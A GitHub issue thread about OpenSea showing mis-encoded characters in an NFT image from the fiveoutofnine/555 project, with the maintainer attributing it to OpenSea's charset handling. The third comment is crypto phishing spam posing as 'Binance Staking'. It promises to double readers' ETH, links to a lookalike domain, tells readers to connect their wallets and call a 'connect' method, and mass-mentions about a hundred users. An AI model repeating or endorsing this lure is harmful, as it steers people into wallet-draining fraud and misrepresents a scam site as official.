### ISSUE TITLE
OpenSea image display shows ”€â characters

### ISSUE THREAD

**Issue by abcoathup** [fiveoutofnine/555#2]
OpenSea image display shows ”€â characters when viewing a single NFT
https://opensea.io/assets/base/0x555555554f0ef522f41b2c46d941deb4d731eb65/1

Example from Brave on Windows: 
![image](https://github.com/fiveoutofnine/555/assets/28278242/107f0d51-d81b-4130-91d4-2bb354c55f84)

Viewing the [entire collection on OpenSea](https://opensea.io/collection/555-1000-x-5-9) or the [original media](https://raw.seadn.io/files/6286dd2af562b2e6a6065f8ffbe308ff.svg) shows no issues
![image](https://github.com/fiveoutofnine/555/assets/28278242/53563d54-1ed8-450f-a431-97548a9f906d)
![image](https://github.com/fiveoutofnine/555/assets/28278242/df616872-9cb7-499d-ba13-727bd7ec4191)

**Comment by fiveoutofnine** [comment]
unfortunately, I believe that's an issue on their end :(

afaik, they don't respect `charset=utf-8` on `animation_url`

**Comment by amit-sinotechmarine** [comment]
## 🚀 Double Your ETH with Binance Staking

Earn rewards and secure your financial future by staking your ETH with Binance. By participating in the Binance staking program, you can potentially double your ETH while supporting the blockchain network.

[![Start Staking Now](https://miro.medium.com/v2/resize:fit:720/format:webp/1*Ssf-ZH2f2V5dLyn7zYTXHg.png)](https://app.bnbinchain.com/en/bnb-staking?utm_source=email&utm_campaign=leads&utm_id=github)

**Click the banner above** to learn more and start staking your ETH with Binance today!

### How to Stake on Binance:
1. **[Visit the Official Binance Staking Page](https://app.bnbinchain.com/en/bnb-staking?utm_source=email&utm_campaign=leads&utm_id=github):** Click the link to navigate to the official staking page.
2. **Connect Your Wallet:** Ensure you have a wallet with sufficient ETH, then securely connect it to Binance.
3. **Interact with the Staking Method:** Follow the instructions to use the "connect" method and begin staking your ETH from your wallet balance.
s7v7nislands, @chaosxcode, @hridyansh07, @0xjkrdev, @carterwilkinson, @dubcdr, @2manslkh, @L1nkus, @zhangyiyan617, @Carpetlord, @equaliser0, @dtmkeng, @0xRyuzaki, @MftFrank, @tamakisquare, @ratankaliani, @Kitryn, @henrytirla, @whrazseoi27296, @timetrp, @xiaol0ng, @edmundtcy, @terrygmk, @AttilaAs, @sebdnd, @bennevans, @wazzan, @jrhea, @brandonseverin, @nickbytes, @ghgoodreau, @dlee77, @kootsZhin, @hu490170832, @achessor, @Kurby1, @fabiojundev, @samaritanz, @colekennelly1, @zennomi, @HilliamT, @5ch0ng444, @GarenWoo, @Cosinhs, @Xiscollado, @nam3t, @heyheytim, @sourcelator, @mbotboi, @edgarpavlovskyWyatt-Stanke, @Ratedd, @jerritz, @Ksaizo1, @johnthethird, @apemon, @ck112358, @carzygod, @sh0dh, @zachperez, @robre, @PaulGG-Code, @rcty, @myself659, @antoineandrieu, @sebboj, @clemlak, @eugenioclrc, @LucasBitt7, @prashanth-novopay, @garyb9, @montycheese, @kumasu, @xenedium, @ConvexDegen, @Sxazal, @levi215, @wyatt00, @wolflo, @luisalrp, @niftyorca, @MeanReem, @lucasboy66, @m1gicturtl, @la4ce, @marcgraczyk, @330324jby, @LarryStanley, @oo7ph, @chenyu1024, @p0n1, @whchengaa, @Kadium, @teddav, @sohamxz, @kels-code, @paverett, @Wenqin740, @daedlock, @noprague
